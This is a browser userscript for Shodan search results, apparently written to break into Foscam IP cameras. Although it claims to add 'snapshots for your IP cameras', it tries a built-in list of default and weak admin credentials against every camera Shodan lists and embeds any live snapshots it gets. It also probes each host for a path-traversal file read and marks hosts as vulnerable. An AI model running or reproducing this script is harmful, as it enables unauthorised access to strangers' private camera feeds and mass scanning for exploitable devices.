// ==UserScript==
// @name         Foscam
// @description  Adds snapshots for your IP cameras
// @author       doerindabutt
// @match        https://www.shodan.io/search?query*
// @grant        GM_xmlhttpRequest
// ==/UserScript==


var ENABLED_LOGGABLE_VIDEOSTREAM = false;
var ENABLED_SNAPSHOT = true;
var ENABLED_TRAVERSAL = true;
var IPs = [];
var TIMEOUT_IN_MS = 1000;

addCredentials = function(type, username, password, url)
{
        if(type == 1)
        { // add at http
                return url.replace("http://", "http://" + username + ":" + password + "@");
        }
        else
        {
                if(url.indexOf("?") > 0)
                {
                        url += "&";
                }
                else
                {
                        url += "?";
                }
                return url + "user=" + username + "&pwd=" + password;
        }
};


var shodanIPs = document.getElementsByClassName("ip");
var i = 0;
for(i = 0; i < shodanIPs.length; i++)
{
        var url = shodanIPs[i].getElementsByTagName("a")[1].href;
        var videostream = addCredentials(1, "admin", "a9b8c7d6", url + "snapshot.cgi");
        var snapshot = addCredentials(2, "admin", "a1b2c3d4", url + "snapshot.cgi");
        var snapshot2 = addCredentials(2, "admin1", "a9b8c7d6", url + "videostream.cgi");
        var snapshot3 = addCredentials(2, "admin1", "1234qwer", url + "snapshot.cgi");
        var snapshot4 = addCredentials(2, "admin", "", url + "snapshot.cgi");
        var snapshot5 = addCredentials(2, "admin", "admin", url + "videostream.cgi");
        var snapshot6 = addCredentials(2, "admin", "admin1", url + "snapshot.cgi");
        var snapshot7 = addCredentials(2, "admin", "iloveyou", url + "snapshot.cgi");
        var snapshot8 = addCredentials(2, "admin", "foscam", url + "videostream.cgi");
        var snapshot9 = addCredentials(2, "admin1", "admin1", url + "snapshot.cgi");
        var snapshot10 = addCredentials(2, "admin", "123456", url + "videostream.cgi");
        var snapshot11 = addCredentials(2, "admin", "qwerty", url + "snapshot.cgi");
        var snapshot12 = addCredentials(2, "admin1", "kermit", url + "snapshot.cgi");
        var snapshot13 = addCredentials(2, "admin", "letmein", url + "snapshot.cgi");
        var snapshot14 = addCredentials(2, "admin1", "12345", url + "snapshot.cgi");
        var snapshot15 = addCredentials(2, "admin1", "", url + "snapshot.cgi");


    //var traversalCheck = url + "//etc/RT2870STA.dat";

        var addition = "<br />";

        if(ENABLED_LOGGABLE_VIDEOSTREAM)
        {
                addition += "Loggable: <img src=\"" + videostream + "\" /><br />";
        }
        if(ENABLED_SNAPSHOT)
        {
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot2 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot3 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot4 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot5 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot6 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot7 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot8 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot9 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot10 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot11 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot12 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot13 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot14 + "\" /><br />";
                addition += "<img onerror='this.style.display = \"none\"' src=\"" + snapshot15 + "\" /><br />"

        }
    if(ENABLED_TRAVERSAL)
    {
        addition += "<div class=\"" + url + "\"> </div>";
        IPs.unshift(url);
    }

        shodanIPs[i].innerHTML += addition;
}

function checkVulnerability()
{
    if(IPs.length > 0)
    {
        var currentIP = IPs.pop();
        GM_xmlhttpRequest({
            url: currentIP + "/etc/RT2870STA.dat",
            method: "GET",
            onload: function(response) {
                var text = "";
                if(response.status == "200")
                {
                    text = "<b><u>Vulnerable to //proc/kcore!</u></b>";
                }
                else
                {
                    text = "Not vulnerable?";
                }
                document.getElementsByClassName(currentIP)[0].innerHTML = text;
                checkVulnerability();
            },
            timeout: TIMEOUT_IN_MS,
            ontimeout: function() {
                var text = "Request timed out (Is site up?)";
                document.getElementsByClassName(currentIP)[0].innerHTML = text;
                checkVulnerability();
            }
        });
    }
}

checkVulnerability();